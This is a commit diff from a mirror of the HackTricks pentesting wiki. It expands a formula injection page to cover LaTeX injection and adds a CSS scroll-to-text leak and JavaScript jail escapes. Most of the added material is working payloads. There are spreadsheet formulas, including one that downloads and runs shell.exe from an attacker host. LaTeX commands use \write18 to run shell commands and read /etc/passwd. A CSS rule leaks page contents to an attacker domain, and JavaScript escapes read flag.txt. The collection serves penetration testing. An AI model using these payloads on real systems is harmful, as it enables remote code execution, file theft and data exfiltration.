Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3313] No subject

Browse source
This commit is contained in:
CPol 2022-07-10 22:26:52 +00:00 committed by gitbook-bot
parent 792413b4bf
commit 1a05533f33
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 178 additions and 11 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
SUMMARY.md
View file

@ -458,7 +458,7 @@
* [LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure](pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
* [File Upload](pentesting-web/file-upload/README.md)
* [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md)
* [Formula Injection](pentesting-web/formula-injection.md)
* [Formula/Doc/LaTeX Injection](pentesting-web/formula-doc-latex-injection.md)
* [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling/README.md)
* [Request Smuggling in HTTP/2 Downgrades](pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md)
* [HTTP Response Smuggling / Desync](pentesting-web/http-response-smuggling-desync.md)

115
pentesting-web/formula-injection.md → pentesting-web/formula-doc-latex-injection.md
View file

@ -1,6 +1,4 @@
# Formula Injection
## Formula Injection
# Formula/Doc/LaTeX Injection
<details>
@ -18,7 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## Info
## Formula Injection
### Info
If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
@ -26,7 +26,7 @@ If your **input** is being **reflected** inside **CSV file**s (or any other file
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
{% endhint %}
## Hyperlink
### Hyperlink
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
@ -49,7 +49,7 @@ The details of student in logged in the attackers web server.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)
## RCE
### RCE
For this example to work it's **needed to have enable the following configuration**:\
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
@ -67,7 +67,7 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
## LFI
### LFI
**LibreOffice Calc**
@ -85,7 +85,7 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“)),”.\<FQDN>”) Concatenate the output from the file (after the above processing has taken place) with the FQDN (for which we have access to the host that is authoritative for the domain)
* WEBSERVICE Will make a request for this non-existent DNS name which we can then parse the logs (or run tcpdump etc.) on the DNS authoritative name server for which we have control
## Google Sheets OOB Data Exfiltration
### Google Sheets OOB Data Exfiltration
Firstly, lets introduce some of the more interesting functions.
@ -125,9 +125,106 @@ Firstly, lets introduce some of the more interesting functions.
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
## LaTeX Injection
Usually the servers that will find on the internet that **convert LaTeX code to PDF** use **`pdflatex`**.\
This program uses 3 main attributes to (dis)allow command execution:
* **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** **commands (**On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.
### Read file <a href="#read-file" id="read-file"></a>
```bash
\input{/etc/passwd}
\include{password} # load .tex file
```
#### Read single lined file
```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
#### Read multiple lined file
```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
#### Read text file, keep the formatting
```bash
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
### Write file <a href="#write-file" id="write-file"></a>
```bash
ewwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
### Command execution <a href="#command-execution" id="command-execution"></a>
The input of the command will be redirected to stdin, use a temp file to get it.
```bash
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
```
If you get any LaTex error, consider using base64 to get the result without bad characters
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```bash
\input|ls|base4
\input{|"/bin/hostname"}
```
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
## References
{% embed url="https://notsosecure.com/data-exfiltration-formula-injection/" %}
* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
<details>

2
pentesting-web/web-vulnerabilities-methodology.md
View file

@ -123,7 +123,7 @@ Functionalities that generates files including user input might execute unexpect
Users that open files uploaded by users or automatically generated including user input might be compromised.
* [ ] [**File Upload**](file-upload/)
* [ ] [**Formula Injection**](formula-injection.md)
* [ ] [**Formula Injection**](formula-doc-latex-injection.md)
* [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)
* [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)

35
pentesting-web/xs-search/css-injection/README.md
View file

@ -127,6 +127,41 @@ Basically the main idea is to **use a custom font from an endpoint controlled by
</html>
```
### Styling Scroll-to-Text Fragment
When a **URL fragment targets an element**, the [**`:target`**](https://drafts.csswg.org/selectors-4/#the-target-pseudo) pseudo-class **can be used** to select it, but **`::target-text` does not match anything**. It only matches text that is itself targeted by the \[fragment].
Therefore, an attacker could use the **Scroll-to-text** fragment and if **something is found** with that text we can **load a resource** from the attackers server to indicate it:&#x20;
```
:target::before { content : url(target.png) }
```
An example of this attack could be:
```
http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
```
Which is sending the code:
```css
<style>:target::before { content : url(http://attackers-domain/?confirmed_existence_of_Administrator_username) }</style>
```
with the scroll-to-text fragment: `#:~:text=Administrator`
If the word Administrator is found, the indicated resource will be loaded.
There are three main mitigations:
1. **STTF can match only words or sentences on a web page**, theoretically making it impossible to leak random secrets or tokens (unless we break down the secret in one-letter paragraphs).
2. It is **restricted to top-level browsing contexts**, so it wont work in an iframe, making the attack **visible to the victim**.
3. **User-activation gesture is needed for STTF to work**, so only navigations that are a result of user actions are exploitable, which greatly decreases the possibility to automate the attack without user interaction. However, there are certain conditions that the author of the above blog post discovered that facilitate the automation of the attack. Another, similar case, will be presented in PoC#3.
1. There are some **bypasses** for this like **social engineering**, or **forcing common browser extensions to interact**.
For more information check the original report: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
You can specify **external fonts for specific unicode values** that will only be **gathered if those unicode values are present** in the page. For example:

35
pentesting-web/xss-cross-site-scripting/README.md
View file

@ -778,6 +778,41 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](./#javascript-function) to find how to abuse this behaviour.
### XS Jails
If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
```javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
// use of with
with(console)log(123)
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
### Obfuscation & Advanced Bypass
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)